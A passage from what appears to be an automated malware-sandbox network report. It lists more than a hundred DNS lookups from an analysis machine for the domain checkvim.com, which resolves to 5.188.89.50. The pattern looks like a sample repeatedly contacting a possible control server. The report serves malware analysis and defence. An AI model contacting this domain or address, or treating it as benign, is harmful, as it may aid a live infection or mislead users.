                    Sep 28, 2021 06:51:36.321048021 CEST5851653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:36.340655088 CEST53585168.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:36.957783937 CEST6318753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:36.977107048 CEST53631878.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:37.564486980 CEST6027853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:37.583689928 CEST53602788.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:38.208432913 CEST6035253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:38.227706909 CEST53603528.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:38.829217911 CEST5586953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:38.848547935 CEST53558698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:39.452426910 CEST6302553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:39.471940994 CEST53630258.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:40.416774988 CEST5253453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:40.437524080 CEST53525348.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:41.019485950 CEST5935053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:41.041893959 CEST53593508.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:41.626322031 CEST5445653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:41.645601034 CEST53544568.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:42.283423901 CEST5919653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:42.304616928 CEST53591968.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:42.907963991 CEST5080453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:42.928423882 CEST53508048.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:43.508258104 CEST5514353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:43.525496006 CEST53551438.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:44.127722025 CEST6089253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:44.146752119 CEST53608928.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:44.765714884 CEST5890253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:44.785208941 CEST53589028.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:45.401850939 CEST5138953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:45.422796011 CEST53513898.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:46.009896040 CEST5054453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:46.027328968 CEST53505448.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:46.632900000 CEST6393353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:46.652699947 CEST53639338.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:47.259546041 CEST6439953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:47.281250000 CEST53643998.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:47.895335913 CEST5566153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:47.912065029 CEST53556618.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:48.521167040 CEST5443653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:48.542418957 CEST53544368.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:49.163410902 CEST5516853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:49.182720900 CEST53551688.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:49.793617010 CEST6028053192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:49.812793970 CEST53602808.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:50.409174919 CEST5551653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:50.428427935 CEST53555168.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:51.076284885 CEST5596953192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:51.094007015 CEST53559698.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:51.765100002 CEST5846653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:51.785337925 CEST53584668.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:52.385508060 CEST6210653192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:52.404402971 CEST53621068.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:53.012155056 CEST5599253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:53.032078981 CEST53559928.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:53.635257959 CEST6270153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:53.652053118 CEST53627018.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:54.247356892 CEST5165853192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:54.266855001 CEST53516588.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:54.878504038 CEST6266553192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:54.898588896 CEST53626658.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:55.483758926 CEST5618153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:55.501737118 CEST53561818.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:56.264363050 CEST5937753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:56.284024954 CEST53593778.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:56.878813028 CEST5021253192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:56.897857904 CEST53502128.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:57.643562078 CEST6133353192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:57.662775040 CEST53613338.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:58.263293982 CEST5982753192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:58.280199051 CEST53598278.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:58.883229017 CEST5788453192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:58.900548935 CEST53578848.8.8.8192.168.2.22
                    Sep 28, 2021 06:51:59.524702072 CEST5230153192.168.2.228.8.8.8
                    Sep 28, 2021 06:51:59.543994904 CEST53523018.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:00.126727104 CEST5098453192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:00.146327972 CEST53509848.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:00.767751932 CEST6216253192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:00.787919998 CEST53621628.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:01.459906101 CEST5360953192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:01.479352951 CEST53536098.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.086131096 CEST5746853192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.105777979 CEST53574688.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.770040989 CEST5823453192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.789148092 CEST53582348.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:03.436384916 CEST6191553192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:03.457667112 CEST53619158.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:04.040453911 CEST5179153192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:04.060210943 CEST53517918.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Sep 28, 2021 06:50:29.479912043 CEST192.168.2.228.8.8.80xe7f9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.139365911 CEST192.168.2.228.8.8.80xa67bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.691550970 CEST192.168.2.228.8.8.80x3958Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:31.397732973 CEST192.168.2.228.8.8.80x5f12Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:33.491646051 CEST192.168.2.228.8.8.80x9ca6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.241339922 CEST192.168.2.228.8.8.80xe8f3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.892030001 CEST192.168.2.228.8.8.80x1942Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:37.517440081 CEST192.168.2.228.8.8.80xca69Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.161380053 CEST192.168.2.228.8.8.80x120bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.872611046 CEST192.168.2.228.8.8.80x6d9bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:39.543977022 CEST192.168.2.228.8.8.80x1ddStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.224781036 CEST192.168.2.228.8.8.80xc75bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.868150949 CEST192.168.2.228.8.8.80xb758Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:41.540992975 CEST192.168.2.228.8.8.80x573Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.207612038 CEST192.168.2.228.8.8.80x47cdStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.861419916 CEST192.168.2.228.8.8.80x2585Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:43.562501907 CEST192.168.2.228.8.8.80xe128Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.223608017 CEST192.168.2.228.8.8.80x7c94Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:44.894368887 CEST192.168.2.228.8.8.80x22e6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:45.510138988 CEST192.168.2.228.8.8.80xaf08Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.159521103 CEST192.168.2.228.8.8.80xe7edStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:46.836015940 CEST192.168.2.228.8.8.80xb5d5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:47.470155001 CEST192.168.2.228.8.8.80x4469Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.125072002 CEST192.168.2.228.8.8.80x27fcStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:48.797341108 CEST192.168.2.228.8.8.80x27afStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:49.456911087 CEST192.168.2.228.8.8.80x5bccStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.103096962 CEST192.168.2.228.8.8.80x584dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:50.736572981 CEST192.168.2.228.8.8.80x7e52Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:51.573493958 CEST192.168.2.228.8.8.80xc11Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:52.347374916 CEST192.168.2.228.8.8.80x54a8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.273158073 CEST192.168.2.228.8.8.80x1a9bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:53.927613974 CEST192.168.2.228.8.8.80xedb1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:54.591924906 CEST192.168.2.228.8.8.80xdf9eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.214793921 CEST192.168.2.228.8.8.80x113eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:55.894778967 CEST192.168.2.228.8.8.80x8cc3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:56.533139944 CEST192.168.2.228.8.8.80xbae2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.189132929 CEST192.168.2.228.8.8.80xf818Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:57.797666073 CEST192.168.2.228.8.8.80x90bcStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:58.491209030 CEST192.168.2.228.8.8.80xd685Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.137286901 CEST192.168.2.228.8.8.80x2384Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:59.792362928 CEST192.168.2.228.8.8.80xfc87Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:00.442684889 CEST192.168.2.228.8.8.80xd67aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.097755909 CEST192.168.2.228.8.8.80xa7e8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:01.767754078 CEST192.168.2.228.8.8.80xd14Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:02.415457010 CEST192.168.2.228.8.8.80x916fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.058557987 CEST192.168.2.228.8.8.80xbbb4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:03.716505051 CEST192.168.2.228.8.8.80x3d1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.366527081 CEST192.168.2.228.8.8.80xe82eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:04.998681068 CEST192.168.2.228.8.8.80x5705Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:05.614173889 CEST192.168.2.228.8.8.80x3e25Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.227550030 CEST192.168.2.228.8.8.80x70b4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:06.860356092 CEST192.168.2.228.8.8.80x7f95Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:07.506026983 CEST192.168.2.228.8.8.80x7633Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.143147945 CEST192.168.2.228.8.8.80x264cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:08.750855923 CEST192.168.2.228.8.8.80x3cd3Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.357036114 CEST192.168.2.228.8.8.80xa48dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:09.988940001 CEST192.168.2.228.8.8.80xde0eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:10.594608068 CEST192.168.2.228.8.8.80xb4f5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.237409115 CEST192.168.2.228.8.8.80x8c7bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:11.828600883 CEST192.168.2.228.8.8.80xab7bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:12.454752922 CEST192.168.2.228.8.8.80x7ce5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.094235897 CEST192.168.2.228.8.8.80x7348Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:13.729536057 CEST192.168.2.228.8.8.80xba52Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.335000992 CEST192.168.2.228.8.8.80x23e2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:14.965274096 CEST192.168.2.228.8.8.80x4ed0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:15.632652044 CEST192.168.2.228.8.8.80xd6d7Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.251604080 CEST192.168.2.228.8.8.80x76b5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:16.858936071 CEST192.168.2.228.8.8.80x4a4dStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:17.496031046 CEST192.168.2.228.8.8.80x65eeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.093348026 CEST192.168.2.228.8.8.80x718bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:18.739155054 CEST192.168.2.228.8.8.80x83b4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.352169037 CEST192.168.2.228.8.8.80x62c8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:19.994096041 CEST192.168.2.228.8.8.80xb755Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:20.643477917 CEST192.168.2.228.8.8.80xdbbbStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.261858940 CEST192.168.2.228.8.8.80x2fbeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:21.888906002 CEST192.168.2.228.8.8.80xccbeStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:22.516736984 CEST192.168.2.228.8.8.80x113eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.168349028 CEST192.168.2.228.8.8.80xe199Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:23.780982018 CEST192.168.2.228.8.8.80x3f8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:24.422507048 CEST192.168.2.228.8.8.80x4107Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.031002998 CEST192.168.2.228.8.8.80x74acStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:25.657380104 CEST192.168.2.228.8.8.80xe2bStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.291126966 CEST192.168.2.228.8.8.80xa16aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.962842941 CEST192.168.2.228.8.8.80x9490Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:27.583534002 CEST192.168.2.228.8.8.80xc414Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.176142931 CEST192.168.2.228.8.8.80x7ac6Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.790585995 CEST192.168.2.228.8.8.80x132cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:29.391048908 CEST192.168.2.228.8.8.80x4a40Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.007622957 CEST192.168.2.228.8.8.80xce0aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.622982025 CEST192.168.2.228.8.8.80x26a4Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.258003950 CEST192.168.2.228.8.8.80xfbb5Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.890103102 CEST192.168.2.228.8.8.80xfb02Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:32.550587893 CEST192.168.2.228.8.8.80x7463Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.157046080 CEST192.168.2.228.8.8.80x214eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.804022074 CEST192.168.2.228.8.8.80x4df1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:34.427304983 CEST192.168.2.228.8.8.80xdb50Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.052763939 CEST192.168.2.228.8.8.80x2a25Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.669967890 CEST192.168.2.228.8.8.80x64feStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.321048021 CEST192.168.2.228.8.8.80x785Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.957783937 CEST192.168.2.228.8.8.80xbf3cStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:37.564486980 CEST192.168.2.228.8.8.80x3eeaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.208432913 CEST192.168.2.228.8.8.80xfb53Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.829217911 CEST192.168.2.228.8.8.80xeff0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:39.452426910 CEST192.168.2.228.8.8.80x2267Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:40.416774988 CEST192.168.2.228.8.8.80x97dfStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.019485950 CEST192.168.2.228.8.8.80x7445Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.626322031 CEST192.168.2.228.8.8.80x83b1Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.283423901 CEST192.168.2.228.8.8.80x1e7fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.907963991 CEST192.168.2.228.8.8.80x8815Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:43.508258104 CEST192.168.2.228.8.8.80xe640Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.127722025 CEST192.168.2.228.8.8.80x2d16Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.765714884 CEST192.168.2.228.8.8.80x716fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:45.401850939 CEST192.168.2.228.8.8.80xc08Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.009896040 CEST192.168.2.228.8.8.80x6ceaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.632900000 CEST192.168.2.228.8.8.80x30eaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.259546041 CEST192.168.2.228.8.8.80x1d51Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.895335913 CEST192.168.2.228.8.8.80x6008Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:48.521167040 CEST192.168.2.228.8.8.80xd582Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.163410902 CEST192.168.2.228.8.8.80xb3eaStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.793617010 CEST192.168.2.228.8.8.80xbbd0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:50.409174919 CEST192.168.2.228.8.8.80x21ceStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.076284885 CEST192.168.2.228.8.8.80x5fe2Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.765100002 CEST192.168.2.228.8.8.80xcfa8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:52.385508060 CEST192.168.2.228.8.8.80x46c7Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.012155056 CEST192.168.2.228.8.8.80xc0b8Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.635257959 CEST192.168.2.228.8.8.80x8d66Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.247356892 CEST192.168.2.228.8.8.80xa872Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.878504038 CEST192.168.2.228.8.8.80xaaacStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:55.483758926 CEST192.168.2.228.8.8.80xff5eStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.264363050 CEST192.168.2.228.8.8.80x37edStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.878813028 CEST192.168.2.228.8.8.80xff2fStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:57.643562078 CEST192.168.2.228.8.8.80xd3e9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.263293982 CEST192.168.2.228.8.8.80x75c9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.883229017 CEST192.168.2.228.8.8.80x7d4aStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:59.524702072 CEST192.168.2.228.8.8.80xae13Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.126727104 CEST192.168.2.228.8.8.80xc359Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.767751932 CEST192.168.2.228.8.8.80x13b0Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:01.459906101 CEST192.168.2.228.8.8.80xc0feStandard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.086131096 CEST192.168.2.228.8.8.80x3493Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.770040989 CEST192.168.2.228.8.8.80x4ff9Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:03.436384916 CEST192.168.2.228.8.8.80x3405Standard query (0)checkvim.comA (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:04.040453911 CEST192.168.2.228.8.8.80x9b70Standard query (0)checkvim.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Sep 28, 2021 06:50:29.499205112 CEST8.8.8.8192.168.2.220xe7f9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.158834934 CEST8.8.8.8192.168.2.220xa67bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:30.708821058 CEST8.8.8.8192.168.2.220x3958No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:31.417036057 CEST8.8.8.8192.168.2.220x5f12No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:33.511215925 CEST8.8.8.8192.168.2.220x9ca6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.260610104 CEST8.8.8.8192.168.2.220xe8f3No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:36.909889936 CEST8.8.8.8192.168.2.220x1942No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:37.536830902 CEST8.8.8.8192.168.2.220xca69No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.180830956 CEST8.8.8.8192.168.2.220x120bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:38.891587973 CEST8.8.8.8192.168.2.220x6d9bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:39.563527107 CEST8.8.8.8192.168.2.220x1ddNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.244230032 CEST8.8.8.8192.168.2.220xc75bNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:40.888323069 CEST8.8.8.8192.168.2.220xb758No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:41.560283899 CEST8.8.8.8192.168.2.220x573No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.224773884 CEST8.8.8.8192.168.2.220x47cdNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:42.881131887 CEST8.8.8.8192.168.2.220x2585No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:50:43.582062006 CEST8.8.8.8192.168.2.220xe128No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
